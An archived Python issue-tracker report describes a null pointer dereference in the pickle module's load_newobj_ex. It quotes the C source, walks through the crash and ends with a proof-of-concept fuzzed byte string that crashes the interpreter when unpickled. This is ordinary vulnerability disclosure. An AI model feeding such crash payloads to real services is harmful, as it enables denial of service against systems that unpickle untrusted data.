This issue tracker has been migrated to GitHub, and is currently read-only.
For more information, see the GitHub FAQs in the Python's Developer Guide.

Author blarsen
Recipients blarsen
Date 2015-07-14.02:16:15
SpamBayes Score -1.0
Marked as misclassified Yes
Message-id <1436840178.63.0.757852157332.issue24630@psf.upfronthosting.co.za>
In-reply-to
Content 
`load_newobj_ex` in can crash with a null pointer dereference.


File Modules/_pickle.c:

    static int
    load_newobj_ex(UnpicklerObject *self)
    {
        PyObject *cls, *args, *kwargs;
        PyObject *obj;
        PickleState *st = _Pickle_GetGlobalState();

        // ...

        PDATA_POP(self->stack, cls);                              // *** 1 ***
        if (cls == NULL) {
            Py_DECREF(kwargs);
            Py_DECREF(args);
            return -1;
        }    
    
        if (!PyType_Check(cls)) {                                 // *** 2 ***
            Py_DECREF(kwargs);
            Py_DECREF(args);
            Py_DECREF(cls);
            PyErr_Format(st->UnpicklingError,
                         "NEWOBJ_EX class argument must be a type, not %.200s",
                         Py_TYPE(cls)->tp_name);                  // *** 3 ***
            return -1;
        }

        // ...
    }

1. `cls` is successfully unpickled, but has an ob_type field set to 0
2. `cls` is determined not to be a `PyType` object
3. `Py_TYPE(cls)` gives a null pointer that is dereferenced via `->tp_name`


Environment:

    $ python3.4 --version
    Python 3.4.2

    $ uname -a
    Linux debian-8-amd64 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt9-3~deb8u1 (2015-04-24) x86_64 GNU/Linux


POC:

    from io import BytesIO
    from pickle import load
    
    payload = b']\x8f\x8f\x8f\x8f\x8f\x8f\x8f\x8fGGbG\x10GGGGGGG?GGGGGGG:gGGGGB(GRGGGGUGGGGGGhZGGGJGGGGGGGGGTGGGGGCGGGGGGGGgGG7GB(GRGGGGvGGGGG\xff\xff\x00\x00GGJGGGGGGGGGTGCCCCCCCCCCCCCCCCCCCCCCCC<GGGGGGZCCCCCCGGGGCGGGG\x00GGG\xff\xffdGG hGGGGGGG\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85CCCCCCCCCCCCCCCCCCCCCC\x85\x91\x85\x85\x85\x85CCCC\xccCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC<GGGG\x92\x92\x92\x92\x04\x00\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92\x92CCCCCCCCCCCC<GGGGGGCCC\x03\xe8CCCCCeCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC_CTCCCCCCCCCCCCCCCCCCCCCCCCRCCCCCCCCCCCCCCCCCCCGCCCCCC<GGGGGGCCCCCCCCCCCC\x80\x00CCCCCCCCC\x00\x80\x00\x00$CCCCCCCCCC,CCCC"CCCCCCCCCCCCCCCCCCCCCCCCGGGGGGGGCCCCCCCC\x00\x80\x00\x00$CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC hGGGCCCCCCCQCGCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCPCACCCCCCCCCCCCCCCCCCCCCCCcCCKCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC hGGGGCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC<GGGGGGCCCCCC\xa7\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85\x85CCC$CCCCCCCCCCCCCCCCCCCCCCCC_CCCCCCCCCCCCCCCCCCCCCCCCCCC@CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC<GGGGGGZCCCCCCCCCCCCKCCCCCCGGGGGGGGG?GGGGGGGGgGGGGG\xeb\xeb\xebCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCQCGCCCcCCCCCCCCCC@CCCCCCCCCCCCCCC@CCCCCCCCCCCCCCCCC\x10\x00\x7fCCCCCGCC\x10\x00\x00\x00CCCCCCCCCCCCCCCCCBCCCCCCCCCCCCCCCCCCCCCC_CCCCCCCCCCCCCCCCCCCCCCCCCCCCCACCCCCCCCCCCCCCCCCCCCCCCCCCCBCCCCCCCCCCCCCCFCCCCCCCCCCCCCCCCCCCCCCCC\x00\x00\x00\x80CCCCCC\x85\x85\x85\x85\x85\x91\x85\x85b\x85\x85\x85\x85\x85\x85G\x00GhGGGGGGGGGGGG?GGFGGGGGgGGGGG\xeb\xeb\xeb\xeb\xeb\xeb\xeb\xeb'
    load(BytesIO(payload))
History
Date User Action Args
2015-07-14 02:16:18blarsensetrecipients: + blarsen
2015-07-14 02:16:18blarsensetmessageid: <1436840178.63.0.757852157332.issue24630@psf.upfronthosting.co.za>
2015-07-14 02:16:18blarsenlinkissue24630 messages
2015-07-14 02:16:16blarsencreate